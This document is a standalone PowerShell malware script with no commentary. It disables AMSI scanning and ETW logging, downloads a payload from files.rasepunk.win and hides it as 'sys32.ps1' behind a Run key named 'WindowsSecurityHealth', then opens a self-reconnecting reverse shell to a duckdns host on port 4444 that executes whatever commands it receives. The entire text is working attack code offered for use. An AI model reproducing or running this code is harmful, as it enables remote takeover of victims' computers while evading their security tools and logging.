# --- STAGE 1: AMSI BYPASS --- try { [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) } catch {} # --- STAGE 2: ETW BYPASS --- try { $e = [Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider', 'NonPublic,Static').GetValue($null) [Reflection.Emit.OpCodes].Assembly.GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled', 'NonPublic,Instance').SetValue($e, 0) } catch {} # --- STAGE 3: PERSISTENCE --- $payloadPath = "$env:APPDATA\Microsoft\Windows\sys32.ps1" $null = New-Item -ItemType Directory -Force -Path (Split-Path $payloadPath) (irm files.rasepunk.win/file.txt) | Out-File -Encoding ASCII $payloadPath $runCmd = "powershell -w h -ep bypass -f `"$payloadPath`"" New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "WindowsSecurityHealth" -Value $runCmd -PropertyType String -Force | Out-Null # --- STAGE 4: REVERSE SHELL --- $attackerIP = 'xxrrxx.duckdns.org' $attackerPort = 4444 function Start-RShell { param($ip, $port) try { $client = New-Object System.Net.Sockets.TCPClient($ip, $port) $stream = $client.GetStream() [byte[]]$bytes = 0..65535|%{0} $sendback = "PS " + (pwd).Path + "> " $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback) $stream.Write($sendbyte, 0, $sendbyte.Length) while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i) $sendback = (iex $data 2>&1 | Out-String ) $sendback2 = $sendback + "PS " + (pwd).Path + "> " $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2) $stream.Write($sendbyte, 0, $sendbyte.Length) $stream.Flush() } $client.Close() } catch { Start-Sleep -Seconds 30 Start-RShell -ip $ip -port $port } } # Fork to background Start-Job -ScriptBlock { param($ip, $port, $func) iex $func Start-RShell -ip $ip -port $port } -ArgumentList $attackerIP, $attackerPort, ${function:Start-RShell}.ToString() | Out-Null